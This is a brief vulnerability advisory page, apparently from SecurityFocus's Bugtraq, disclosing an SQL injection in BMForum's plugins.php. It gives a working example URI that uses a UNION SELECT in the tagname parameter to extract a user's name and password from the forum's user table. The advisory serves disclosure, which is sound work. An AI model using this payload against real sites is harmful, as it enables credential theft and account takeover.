Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

BMForum 'plugins.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/[installdir]/plugins.php?p=tags&forumid=0&tagname=-1'+union+select+1,concat_ws(0x3a,username,pwd),3,4+from+bmb_userlist+where+userid=1/*







 

Privacy Statement
Copyright 2009, SecurityFocus